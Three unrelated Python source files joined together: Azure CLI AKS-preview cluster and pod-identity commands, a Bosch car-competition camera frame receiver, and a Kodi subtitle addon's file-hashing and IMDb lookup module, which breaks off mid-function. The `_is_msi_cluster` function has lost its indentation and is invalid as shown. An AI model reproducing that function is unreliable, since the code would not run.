    need_grant_vnet_permission_to_cluster_identity,
    vnet_subnet_id,
    enable_managed_identity,
    attach_acr,
    headers,
    no_wait
):
    """PUT the managed cluster and perform any required post-creation role
    assignments (monitoring MDM metrics, ingress-appgw, virtual-node, VNet
    Network Contributor, ACR pull).

    When any such assignment is needed, the create/update is awaited
    synchronously regardless of ``no_wait``; otherwise the LRO poller is
    returned per ``no_wait``.
    """
    # some addons require post cluster creation role assigment
    need_post_creation_role_assignment = (monitoring_addon_enabled or
                                          ingress_appgw_addon_enabled or
                                          (enable_managed_identity and attach_acr) or
                                          virtual_node_addon_enabled or
                                          need_grant_vnet_permission_to_cluster_identity)
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
            resource_group_name=resource_group_name,
            resource_name=name,
            parameters=managed_cluster,
            headers=headers))
        cloud_name = cmd.cli_ctx.cloud.name
        # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
        # mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
        if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            add_ingress_appgw_addon_role_assignment(cluster, cmd)
        if virtual_node_addon_enabled:
            add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
        if need_grant_vnet_permission_to_cluster_identity:
            if not create_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                          cluster.identity.principal_id, scope=vnet_subnet_id,
                                          resolve_assignee=False):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')
        if enable_managed_identity and attach_acr:
            # Attach ACR to cluster enabled managed identity
            if cluster.identity_profile is None or \
                    cluster.identity_profile["kubeletidentity"] is None:
                logger.warning('Your cluster is successfully created, but we failed to attach '
                               'acr to it, you can manually grant permission to the identity '
                               'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
                               'it permission to pull from ACR.')
            else:
                kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
                _ensure_aks_acr(cmd.cli_ctx,
                                client_id=kubelet_identity_client_id,
                                acr_name_or_id=attach_acr,
                                subscription_id=subscription_id)
    else:
        cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
                              resource_group_name=resource_group_name,
                              resource_name=name,
                              parameters=managed_cluster,
                              headers=headers)
    return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
    """Parse a kubelet-configuration JSON file into a KubeletConfig object.

    Raises CLIError when the path is not a readable file or the document is
    not a JSON object. Absent keys leave the corresponding attribute as None.
    """
    if not os.path.isfile(file_path):
        raise CLIError("{} is not valid file, or not accessable.".format(file_path))
    kubelet_config = get_file_json(file_path)
    if not isinstance(kubelet_config, dict):
        raise CLIError(
            "Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
    # JSON camelCase key -> KubeletConfig snake_case attribute
    field_map = {
        "cpuManagerPolicy": "cpu_manager_policy",
        "cpuCfsQuota": "cpu_cfs_quota",
        "cpuCfsQuotaPeriod": "cpu_cfs_quota_period",
        "imageGcHighThreshold": "image_gc_high_threshold",
        "imageGcLowThreshold": "image_gc_low_threshold",
        "topologyManagerPolicy": "topology_manager_policy",
        "allowedUnsafeSysctls": "allowed_unsafe_sysctls",
        "failSwapOn": "fail_swap_on",
        "containerLogMaxFiles": "container_log_max_files",
        "containerLogMaxSizeMB": "container_log_max_size_mb",
        "podMaxPids": "pod_max_pids",
    }
    config_object = KubeletConfig()
    for json_key, attr in field_map.items():
        setattr(config_object, attr, kubelet_config.get(json_key, None))
    return config_object
def _get_linux_os_config(file_path):
    """Parse a Linux OS configuration JSON file into a LinuxOSConfig object.

    Raises CLIError when the path is not a readable file, the document is not
    a JSON object, or its "sysctls" member is not a JSON object.
    NOTE(review): a "sysctls" object is effectively mandatory — a config
    without it is rejected here; confirm that is the intended contract.
    """
    if not os.path.isfile(file_path):
        raise CLIError("{} is not valid file, or not accessable.".format(file_path))
    os_config = get_file_json(file_path)
    if not isinstance(os_config, dict):
        raise CLIError(
            "Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
    config_object = LinuxOSConfig()
    # top-level settings: JSON camelCase key -> attribute
    for json_key, attr in (("transparentHugePageEnabled", "transparent_huge_page_enabled"),
                           ("transparentHugePageDefrag", "transparent_huge_page_defrag"),
                           ("swapFileSizeMB", "swap_file_size_mb")):
        setattr(config_object, attr, os_config.get(json_key, None))
    # sysctl settings
    sysctls = os_config.get("sysctls", None)
    if not isinstance(sysctls, dict):
        raise CLIError(
            "Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
    sysctl_field_map = {
        "netCoreSomaxconn": "net_core_somaxconn",
        "netCoreNetdevMaxBacklog": "net_core_netdev_max_backlog",
        "netCoreRmemMax": "net_core_rmem_max",
        "netCoreWmemMax": "net_core_wmem_max",
        "netCoreOptmemMax": "net_core_optmem_max",
        "netIpv4TcpMaxSynBacklog": "net_ipv4_tcp_max_syn_backlog",
        "netIpv4TcpMaxTwBuckets": "net_ipv4_tcp_max_tw_buckets",
        "netIpv4TcpFinTimeout": "net_ipv4_tcp_fin_timeout",
        "netIpv4TcpKeepaliveTime": "net_ipv4_tcp_keepalive_time",
        "netIpv4TcpKeepaliveProbes": "net_ipv4_tcp_keepalive_probes",
        # attribute name below follows the SDK model's (unusual) spelling
        "netIpv4TcpkeepaliveIntvl": "net_ipv4_tcpkeepalive_intvl",
        "netIpv4TcpRmem": "net_ipv4_tcp_rmem",
        "netIpv4TcpWmem": "net_ipv4_tcp_wmem",
        "netIpv4TcpTwReuse": "net_ipv4_tcp_tw_reuse",
        "netIpv4IpLocalPortRange": "net_ipv4_ip_local_port_range",
        "netIpv4NeighDefaultGcThresh1": "net_ipv4_neigh_default_gc_thresh1",
        "netIpv4NeighDefaultGcThresh2": "net_ipv4_neigh_default_gc_thresh2",
        "netIpv4NeighDefaultGcThresh3": "net_ipv4_neigh_default_gc_thresh3",
        "netNetfilterNfConntrackMax": "net_netfilter_nf_conntrack_max",
        "netNetfilterNfConntrackBuckets": "net_netfilter_nf_conntrack_buckets",
        "fsInotifyMaxUserWatches": "fs_inotify_max_user_watches",
        "fsFileMax": "fs_file_max",
        "fsAioMaxNr": "fs_aio_max_nr",
        "fsNrOpen": "fs_nr_open",
        "kernelThreadsMax": "kernel_threads_max",
        "vmMaxMapCount": "vm_max_map_count",
        "vmSwappiness": "vm_swappiness",
        "vmVfsCachePressure": "vm_vfs_cache_pressure",
    }
    config_object.sysctls = SysctlConfig()
    for json_key, attr in sysctl_field_map.items():
        setattr(config_object.sysctls, attr, sysctls.get(json_key, None))
    return config_object
def _get_http_proxy_config(file_path):
    """Load an HTTP proxy configuration for a managed cluster from a JSON file.

    :param file_path: Path to a JSON file with the keys httpProxy, httpsProxy,
        noProxy and trustedCa (see https://aka.ms/HttpProxyConfig).
    :return: A populated ManagedClusterHTTPProxyConfig; keys missing from the
        file are left as None.
    :raises CLIError: If the file does not exist, is not readable, or does not
        contain a JSON object.
    """
    if not os.path.isfile(file_path):
        # fixed wording/spelling of the user-facing error message
        raise CLIError("{} is not a valid file, or not accessible.".format(file_path))

    hp_config = get_file_json(file_path)
    if not isinstance(hp_config, dict):
        raise CLIError(
            "Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))

    config_object = ManagedClusterHTTPProxyConfig()
    config_object.http_proxy = hp_config.get("httpProxy", None)
    config_object.https_proxy = hp_config.get("httpsProxy", None)
    config_object.no_proxy = hp_config.get("noProxy", None)
    config_object.trusted_ca = hp_config.get("trustedCa", None)

    return config_object
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
                         identity_name, identity_namespace, identity_resource_id,
                         binding_selector=None,
                         no_wait=False):  # pylint: disable=unused-argument
    """Add a pod identity to a managed cluster.

    Fetches the cluster, verifies the pod identity addon is enabled, grants
    the Managed Identity Operator permission on the user-assigned identity,
    appends the new pod identity to the profile, and updates the cluster.
    """
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)

    user_assigned_identity = _get_user_assigned_identity(
        cmd.cli_ctx, identity_resource_id)
    _ensure_managed_identity_operator_permission(
        cmd.cli_ctx, instance, user_assigned_identity.id)

    # start from the existing identities (if any) and append the new one
    pod_identities = []
    if instance.pod_identity_profile.user_assigned_identities:
        pod_identities = instance.pod_identity_profile.user_assigned_identities
    pod_identity = ManagedClusterPodIdentity(
        name=identity_name,
        namespace=identity_namespace,
        identity=UserAssignedIdentity(
            resource_id=user_assigned_identity.id,
            client_id=user_assigned_identity.client_id,
            object_id=user_assigned_identity.principal_id,
        )
    )
    if binding_selector is not None:
        pod_identity.binding_selector = binding_selector
    pod_identities.append(pod_identity)

    # NOTE(review): imported at call time rather than module level — presumably
    # to avoid an import cycle; confirm before hoisting.
    from azext_aks_preview.decorator import AKSPreviewModels
    # store all the models used by pod identity
    pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=pod_identities,
        pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
        models=pod_identity_models
    )

    # send the managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
                            identity_name, identity_namespace,
                            no_wait=False):  # pylint: disable=unused-argument
    """Remove the pod identity matching *identity_name*/*identity_namespace*
    from a managed cluster and push the updated pod identity profile."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)

    existing = instance.pod_identity_profile.user_assigned_identities or []
    # keep every identity except the one being deleted
    pod_identities = [
        identity for identity in existing
        if not (identity.name == identity_name and identity.namespace == identity_namespace)
    ]

    from azext_aks_preview.decorator import AKSPreviewModels
    # store all the models used by pod identity
    pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=pod_identities,
        pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
        models=pod_identity_models
    )

    # push the updated managed cluster representation
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name):  # pylint: disable=unused-argument
    """Return the managed cluster (with null fields stripped) so its pod
    identity profile can be listed."""
    managed_cluster = client.get(resource_group_name, cluster_name)
    return _remove_nulls([managed_cluster])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
                                   exc_name, exc_namespace, pod_labels, no_wait=False):  # pylint: disable=unused-argument
    """Register a pod identity exception (name, namespace, pod labels) on the
    cluster and push the updated pod identity profile."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)

    # start from the existing exceptions (if any) and append the new one
    pod_identity_exceptions = []
    if instance.pod_identity_profile.user_assigned_identity_exceptions:
        pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
    exc = ManagedClusterPodIdentityException(
        name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
    pod_identity_exceptions.append(exc)

    from azext_aks_preview.decorator import AKSPreviewModels
    # store all the models used by pod identity
    pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=pod_identity_exceptions,
        models=pod_identity_models
    )

    # send the managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
                                      exc_name, exc_namespace, no_wait=False):  # pylint: disable=unused-argument
    """Remove the pod identity exception matching *exc_name*/*exc_namespace*
    from the cluster and push the updated pod identity profile."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)

    existing = instance.pod_identity_profile.user_assigned_identity_exceptions or []
    # keep every exception except the one being deleted
    pod_identity_exceptions = [
        exc for exc in existing
        if not (exc.name == exc_name and exc.namespace == exc_namespace)
    ]

    from azext_aks_preview.decorator import AKSPreviewModels
    # store all the models used by pod identity
    pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=pod_identity_exceptions,
        models=pod_identity_models
    )

    # push the updated managed cluster representation
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
                                      exc_name, exc_namespace, pod_labels, no_wait=False):  # pylint: disable=unused-argument
    """Replace the pod labels of an existing pod identity exception.

    :raises CLIError: if no exception with the given name/namespace exists.
    """
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)

    found_target = False
    updated_exc = ManagedClusterPodIdentityException(
        name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
    pod_identity_exceptions = []
    if instance.pod_identity_profile.user_assigned_identity_exceptions:
        for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
            if exc.name == exc_name and exc.namespace == exc_namespace:
                # swap in the updated exception; keep everything else as-is
                found_target = True
                pod_identity_exceptions.append(updated_exc)
            else:
                pod_identity_exceptions.append(exc)

    if not found_target:
        raise CLIError(
            'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))

    from azext_aks_preview.decorator import AKSPreviewModels
    # store all the models used by pod identity
    pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=pod_identity_exceptions,
        models=pod_identity_models
    )

    # send the managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
    """Return the managed cluster (with null fields stripped) so its pod
    identity exceptions can be listed."""
    instance = client.get(resource_group_name, cluster_name)
    return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
    """Grant the cluster identity the Managed Identity Operator role on the
    kubelet identity *scope*, unless an identical assignment already exists.

    :raises CLIError: if the role assignment cannot be created.
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments

    # scan existing assignments at exactly this scope for the same role+principal
    for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
        if i.scope.lower() != scope.lower():
            continue
        if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
            continue
        if i.principal_id.lower() != cluster_identity_object_id.lower():
            continue
        # already assigned
        return

    if not add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
                               is_service_principal=False, scope=scope):
        raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name):  # pylint: disable=unused-argument
    """List the outbound (egress) network dependency endpoints of a managed cluster."""
    return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
def aks_snapshot_create(cmd,    # pylint: disable=too-many-locals,too-many-statements,too-many-branches
                        client,
                        resource_group_name,
                        name,
                        nodepool_id,
                        location=None,
                        tags=None,
                        aks_custom_headers=None,
                        no_wait=False):
    """Create a snapshot of the node pool identified by *nodepool_id*.

    When *location* is not given, the snapshot defaults to the resource
    group's location.
    """
    rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location

    creationData = CreationData(
        source_resource_id=nodepool_id
    )

    snapshot = Snapshot(
        name=name,
        tags=tags,
        location=location,
        creation_data=creationData
    )

    # forward any caller-supplied custom HTTP headers to the service
    headers = get_aks_custom_headers(aks_custom_headers)
    return client.create_or_update(resource_group_name, name, snapshot, headers=headers)
def aks_snapshot_show(cmd, client, resource_group_name, name):  # pylint: disable=unused-argument
    """Fetch a node pool snapshot by resource group and name."""
    return client.get(resource_group_name, name)
def aks_snapshot_delete(cmd,    # pylint: disable=unused-argument
                        client,
                        resource_group_name,
                        name,
                        no_wait=False,
                        yes=False):
    """Delete a node pool snapshot, prompting for confirmation unless *yes*.

    Returns None (without deleting) when the user declines the prompt.
    """
    from knack.prompting import prompt_y_n
    msg = 'This will delete the snapshot "{}" in resource group "{}", Are you sure?'.format(name, resource_group_name)
    if not yes and not prompt_y_n(msg, default="n"):
        return None

    return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None):  # pylint: disable=unused-argument
    """List snapshots in a resource group, or subscription-wide when no
    resource group is given."""
    # treat both None and '' as "no resource group"
    if not resource_group_name:
        return client.list()
    return client.list_by_resource_group(resource_group_name)
|
CameraReceiverProcess.py | # Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import sys
sys.path.append('.')
import time
import socket
import struct
import numpy as np
import cv2
from threading import Thread
import multiprocessing
from multiprocessing import Process,Event
from src.templates.workerprocess import WorkerProcess
class CameraReceiverProcess(WorkerProcess):
    """Debug process that accepts one TCP connection from the camera streamer
    and displays the received length-prefixed JPEG frames with OpenCV."""

    # ===================================== INIT =========================================
    def __init__(self, inPs, outPs):
        """Process used for debugging. Can be used as a direct frame analyzer, instead of using the VNC.
        It receives the images from the raspberry and displays them.

        Parameters
        ----------
        inPs : list(Pipe)
            List of input pipes
        outPs : list(Pipe)
            List of output pipes
        """
        super(CameraReceiverProcess,self).__init__(inPs, outPs)
        # expected decoded frame shape: (rows, cols, channels)
        self.imgSize = (480,640,3)

    # ===================================== RUN ==========================================
    def run(self):
        """Apply the initializers and start the threads.
        """
        self._init_socket()
        super(CameraReceiverProcess,self).run()

    # ===================================== INIT SOCKET ==================================
    def _init_socket(self):
        """Initialize the socket server.

        Blocks until exactly one client connects; the accepted connection is
        wrapped in a buffered binary file object for framed reads.
        """
        self.port = 2244
        self.serverIp = '0.0.0.0'

        self.server_socket = socket.socket()
        self.server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
        self.server_socket.bind((self.serverIp, self.port))

        self.server_socket.listen(0)
        self.connection = self.server_socket.accept()[0].makefile('rb')

    # ===================================== INIT THREADS =================================
    def _init_threads(self):
        """Initialize the read thread to receive and display the frames.
        """
        readTh = Thread(name = 'StreamReceivingThread',target = self._read_stream)
        self.threads.append(readTh)

    # ===================================== READ STREAM ==================================
    def _read_stream(self):
        """Read the image from input stream, decode it and display it with the CV2 library.

        Each frame is length-prefixed: a little-endian uint32 byte count
        followed by the JPEG payload. Loops until the stream errors/closes.
        """
        try:
            while True:
                # read the little-endian uint32 length prefix, then the payload
                image_len = struct.unpack('<L', self.connection.read(struct.calcsize('<L')))[0]
                bts = self.connection.read(image_len)

                # ----------------------- read image -----------------------
                image = np.frombuffer(bts, np.uint8)
                image = cv2.imdecode(image, cv2.IMREAD_COLOR)
                image = np.reshape(image, self.imgSize)
                image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)

                # ----------------------- show images -------------------
                cv2.imshow('Image', image)
                cv2.waitKey(1)
        # NOTE(review): bare except silently ends the display loop on any error
        except:
            pass
        finally:
            self.connection.close()
            self.server_socket.close()
|
video.py | # -*- coding: utf-8 -*-
import os
import json
import struct
import hashlib
import re
import threading
from .kodi import xbmc, xbmcvfs, get_bool_setting
from . import logger, cache, utils, request
# Constants for the OpenSubtitles-style file hash: the first and last 64 KiB
# of the file are summed in 64-bit chunks ('q' = native long long).
__64k = 65536
__longlong_format_char = 'q'
__byte_size = struct.calcsize(__longlong_format_char)


def __sum_64k_bytes(file, result):
    """Read 64 KiB from *file* and fold it, 8 bytes at a time, into
    result.filehash (kept within 64 bits).

    :param file: open file positioned where summing should start; supports
        readBytes() (xbmcvfs.File) or read() (plain file / mock).
    :param result: object with a numeric ``filehash`` attribute, updated in place.
    """
    range_value = __64k / __byte_size
    if utils.py3:
        # true division yields a float on Python 3; range() needs an int
        range_value = round(range_value)
    for _ in range(range_value):
        # xbmcvfs.File exposes readBytes(); fall back to read() otherwise
        try: chunk = file.readBytes(__byte_size)
        except: chunk = file.read(__byte_size)
        (value,) = struct.unpack(__longlong_format_char, chunk)
        result.filehash += value
        # wrap to 64 bits, emulating unsigned overflow
        result.filehash &= 0xFFFFFFFFFFFFFFFF
def __set_size_and_hash(core, meta, filepath):
    """Populate meta.filesize and meta.filehash for *filepath*.

    Uses the OpenSubtitles hash: filesize plus 64-bit sums of the file's
    first and last 64 KiB, rendered as 16 hex digits. Files smaller than
    128 KiB get a size but no hash.
    """
    if core.progress_dialog and not core.progress_dialog.dialog:
        core.progress_dialog.open()

    f = xbmcvfs.File(filepath)
    try:
        filesize = meta.filesize = f.size()

        # used for mocking
        try:
            meta.filehash = f.hash()
            return
        except: pass

        # too small for the two 64 KiB windows the hash requires
        if filesize < __64k * 2:
            return

        # ref: https://trac.opensubtitles.org/projects/opensubtitles/wiki/HashSourceCodes
        # filehash = filesize + 64bit sum of the first and last 64k of the file
        # the lambda serves as a cheap mutable namespace for the accumulator
        result = lambda: None
        result.filehash = filesize
        __sum_64k_bytes(f, result)
        f.seek(filesize - __64k, os.SEEK_SET)
        __sum_64k_bytes(f, result)
        meta.filehash = "%016x" % result.filehash
        logger.notice(meta.filehash)
    finally:
        f.close()
def __get_filename(title):
    """Best-effort filename of the currently playing video.

    Falls back to *title* when no file is playing (or xbmc is unavailable).
    Strips anything trailing the video extension (e.g. query strings appended
    to stream URLs).
    """
    filename = title
    video_exts = ['mkv', 'mp4', 'avi', 'mov', 'mpeg', 'flv', 'wmv']

    try:
        filepath = xbmc.Player().getPlayingFile()
        filename = filepath.split('/')[-1]
        filename = utils.unquote(filename)
        for ext in video_exts:
            # match the extension together with its dot so names that merely
            # contain the letters (e.g. "xavier.wmv" contains "avi") are not
            # truncated at the wrong spot
            marker = '.' + ext
            if marker in filename:
                filename = filename[:filename.index(marker) + len(marker)]
                break
    except: pass

    return filename
def __scrape_tvshow_year(core, meta):
    """Scrape the show's first-air year from its IMDb title page and cache it.

    Sets meta.tvshow_year and persists it in the tvshow-years cache keyed by
    meta.imdb_id. No-op when the page cannot be fetched or parsed.
    """
    imdb_response = request.execute(core, {
        'method': 'GET',
        'url': 'https://www.imdb.com/title/' + meta.imdb_id,
        'timeout': 10,
    })

    if imdb_response.status_code != 200:
        return

    # try several known page layouts in turn; escape the show title so titles
    # containing regex metacharacters (e.g. "Shameless (US)") cannot break or
    # skew the pattern
    show_year_match = re.search(r' %s \((.*?)\)"' % re.escape(meta.tvshow), imdb_response.text)
    if not show_year_match:
        show_year_match = re.search(r'<title>.*?\(TV (?:Mini-)?Series (\d\d\d\d).*?</title>', imdb_response.text)
    if not show_year_match:
        show_year_match = re.search(r'<span class="parentDate">\((\d\d\d\d).*?\)</span>', imdb_response.text)

    if show_year_match:
        meta.tvshow_year = show_year_match.group(1).strip()
        tvshow_years_cache = cache.get_tvshow_years_cache()
        tvshow_years_cache[meta.imdb_id] = meta.tvshow_year
        cache.save_tvshow_years_cache(tvshow_years_cache)
def __scrape_imdb_id(core, meta):
    """Resolve meta.imdb_id (and tvshow_year for shows) via IMDb's suggestion API.

    Movies are matched by exact title and year; TV shows by exact show title
    plus, when several shows match, probing the season's episode listing for
    the episode title. Leaves meta untouched when nothing matches.
    """
    if meta.title == '' or meta.year == '':
        return

    is_movie = meta.season == '' and meta.episode == ''
    title = (meta.title if is_movie else meta.tvshow).lower()
    year = '_%s' % meta.year if is_movie else ''
    # suggestion API queries are lowercased, underscore-joined, max 20 chars
    query = '%s%s' % (title.lower().replace(' ', '_'), year)
    query = query[:20]

    # NOTE(review): this local dict shadows the module-level `request` import;
    # harmless here since only core.request is used below, but worth renaming.
    request = {
        'method': 'GET',
        'url': 'https://v2.sg.media-imdb.com/suggestion/%s/%s.json' % (query[:1], query),
        'timeout': 10
    }

    response = core.request.execute(core, request)
    if response.status_code != 200:
        return

    results = core.json.loads(response.text)
    if len(results['d']) == 0:
        return

    def filter_movie_results(result):
        # `year` is rebound to int(meta.year) below before this closure runs
        year_start = result.get('y', None)
        result_type = result.get('q', None)
        return (
            result_type is not None and result_type in ['feature', 'TV movie'] and
            result['l'].lower() == title and
            (year_start is not None and year_start == year)
        )

    if is_movie:
        year = int(meta.year)
        results = list(filter(filter_movie_results, results['d']))
        if len(results) > 0:
            meta.imdb_id = results[0]['id']
        return

    show_title = title.lower()
    episode_title = meta.title.lower()
    episode_year = int(meta.year)

    def filter_tvshow_results(result):
        # a show matches when the episode year falls within its run ('yr' is
        # a "start-end" range; missing end means still running)
        year_start = result.get('y', None)
        year_end = result.get('yr', '-').split('-')[1]
        result_type = result.get('q', None)
        return (
            result_type is not None and result_type in ['TV series', 'TV mini-series'] and
            result['l'].lower() == show_title and
            (year_start is not None and year_start <= episode_year) and
            (year_end == '' or int(year_end) >= episode_year)
        )

    results = list(filter(filter_tvshow_results, results['d']))
    if len(results) == 0:
        return

    if len(results) == 1:
        meta.tvshow_year = str(results[0]['y'])
        meta.imdb_id = results[0]['id']
        return

    # several candidate shows: pick the one whose season listing contains the
    # episode title we are looking for
    episode_title_pattern = r'title=\"' + re.escape(episode_title) + r'\"'
    for result in results:
        episodes_response = core.request.execute(core, {
            'method': 'GET',
            'url': 'https://www.imdb.com/title/%s/episodes/_ajax?season=%s' % (result['id'], meta.season),
            'timeout': 10
        })

        if episodes_response.status_code != 200:
            continue

        if re.search(episode_title_pattern, episodes_response.text, re.IGNORECASE):
            meta.tvshow_year = str(result['y'])
            meta.imdb_id = result['id']
            return
def __update_info_from_imdb(core, meta, pagination_token=''):
    """Refresh meta's title/year/show/season/episode from IMDb's GraphQL API.

    For an episode imdb_id the series info is filled in from the response;
    for a series imdb_id the episode list is paged through (250 per page,
    recursing with the endCursor) until the entry matching meta.season /
    meta.episode is found, which then supplies the episode title, year and
    imdb_id. Silently returns on request or parse failure.
    """
    request = {
        'method': 'POST',
        'url': 'https://graphql.imdb.com',
        'data': core.json.dumps({
            'query': '''
                query TitlesList($idArray: [ID!]!, $paginationToken: ID) {
                    titles(ids: $idArray) {
                        id
                        titleText {
                            text
                        }
                        releaseDate {
                            year
                        }
                        series {
                            series {
                                id,
                                titleText {
                                    text
                                }
                                releaseDate {
                                    year
                                }
                            }
                            episodeNumber {
                                episodeNumber
                                seasonNumber
                            }
                        }
                        episodes {
                            ...TMD_Episodes_EpisodesCardContainer
                        }
                    }
                }

                fragment TMD_Episodes_EpisodesCardContainer on Episodes {
                    result: episodes(first: 250, after: $paginationToken) {
                        edges {
                            node {
                                ...TMD_Episodes_EpisodeCard
                            }
                        }
                        pageInfo {
                            hasNextPage
                            endCursor
                        }
                    }
                }

                fragment TMD_Episodes_EpisodeCard on Title {
                    id
                    titleText {
                        text
                    }
                    releaseDate {
                        year
                    }
                    series {
                        episodeNumber {
                            episodeNumber
                            seasonNumber
                        }
                    }
                }
            ''',
            'operationName': 'TitlesList',
            'variables': {
                'idArray': [meta.imdb_id],
                'paginationToken': pagination_token
            },
        }),
        'headers': {
            'content-type': 'application/json',
        },
        'timeout': 10
    }

    response = core.request.execute(core, request)
    if response.status_code != 200:
        return

    try:
        result = json.loads(response.text)
        result = result['data']['titles'][0]

        if result['episodes'] is None:
            # imdb_id points at a movie or a single episode
            meta.title = result['titleText']['text']
